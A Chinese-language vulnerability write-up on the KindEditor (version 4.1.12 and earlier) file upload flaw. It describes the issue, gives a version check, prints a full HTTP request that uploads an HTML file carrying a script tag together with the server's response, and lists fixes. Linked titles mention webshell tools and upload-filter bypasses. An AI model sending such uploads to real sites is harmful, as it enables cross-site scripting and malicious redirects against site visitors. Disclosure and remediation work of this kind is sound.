KindEditor 文件上传漏洞验证

简介: KindEditor 文件上传漏洞验证

KindEditor 文件上传漏洞

image.png

漏洞描述

漏洞存在于KindEditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中。

这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm,txt:extTable.Add(“file”,“doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2”)

由于KindEditor中upload_json.*上传功能文件允许被直接调用从而实现上传htm,html到文件到服务器,用户可以通过上传存在包含跳转到违规站点的代码从而实现的恶意攻击。

影响范围

Kindeditor版本<4.1.12

漏洞验证

漏洞存在于<=Kindeditor4.1.12编辑器中,所以先查看编辑器版本

1.查看版本信息

http://www.xxx.com/kindeditor//kindeditor.js

image.png

2.漏洞验证

Request数据包

POST /kindeditor/asp/upload_json.asp?dir=file HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283422705626536477632563104216
Content-Length: 260
Connection: close
Cookie: ASPSESSIONIDQACQQBTT=XXXXXXXXXXXX
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
-----------------------------283422705626536477632563104216
Content-Disposition: form-data; name="imgFile"; filename="1.html"
Content-Type: application/octet-stream
<script>alert('1')</script>
-----------------------------283422705626536477632563104216--

Response数据包

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
Set-Cookie: ASPSESSIONIDSQBRRCAB=BNLFKMXXXXXXXXM; path=/
X-Powered-By: ASP.NET
Date: Thu, 09 Sep 2021 07:33:15 GMT
Connection: close
Content-Length: 94
{"error":0,"url":"\/kindeditor\/asp\/..\/attached\/file\/20210909\/20210909153396539653.html"}

image.png

image.png

漏洞修复

1.直接删除upload_json.和file_manager_json.

2.升级kindeditor到最新版本

参考链接

https://www.anquanke.com/post/id/171422
https://www.cnblogs.com/backlion/p/10421405.html


相关文章
|
2月前
|
安全 网络协议 Shell
文件上传漏洞(七)XISE寄生虫Weevely学习
文件上传漏洞(七)XISE寄生虫Weevely学习
|
2月前
|
安全 Java Linux
文件上传漏洞(三)Cknife
文件上传漏洞(三)Cknife
|
2月前
|
安全 Shell 网络安全
文件上传漏洞(四)edjpgcom
文件上传漏洞(四)edjpgcom
|
2月前
|
存储 安全
文件上传漏洞(六)一句话马图片
文件上传漏洞(六)一句话马图片
|
5月前
|
安全 JavaScript API
文件上传漏洞——绕过
绕过客户端检测(JS检测) 绕过服务端检测(MIME类型检测、文件后缀检测、文件内容检测)
122 1
|
5月前
|
开发框架 安全 JavaScript
文件上传漏洞
文件上传漏洞允许攻击者上传可执行脚本,获取服务器控制权。常见原因包括服务器配置不当、验证不严等。防御措施包括设置不可执行的上传目录、严格文件类型检查、随机化文件名和路径,以及使用独立的文件服务器域名。WebShell是上传的恶意脚本,常用于控制网站服务器。
93 0
|
7月前
|
开发框架 安全 .NET
文件上传漏洞技术总结
该文总结了文件上传技术相关的漏洞和绕过方法,包括语言可解析的后缀(如phtml、pht)、常见的MIME类型、Windows特性(如大小写、ADS流、特殊字符)、0x00截断技巧(需满足PHP版本和magic_quotes_gpc状态)、POST型0x00截断、文件头检查(通过合成图片马绕过)、二次渲染(利用未修改部分插入恶意代码)以及各种服务器的解析漏洞(Apache的.htaccess、解析漏洞,IIS的目录解析、文件解析、默认解析和IIS 7.x/Nginx的畸形解析)。此外,还提到了Java的空字节截断问题。
180 1
文件上传漏洞技术总结
|
设计模式 安全 JavaScript
jQuery-1.7.2 版本任意文件下载漏洞复现
jQuery-1.7.2 版本存在任意文件读取漏洞,攻击者可通过特定URL地址访问并获取敏感信息。
654 1
|
7月前
|
编解码 JavaScript PHP
文件上传绕过的常见方式
文件上传绕过的常见方式
110 0
|
7月前
|
JavaScript 前端开发 PHP
34、文件上传 -- 绕过JS验证
34、文件上传 -- 绕过JS验证
55 0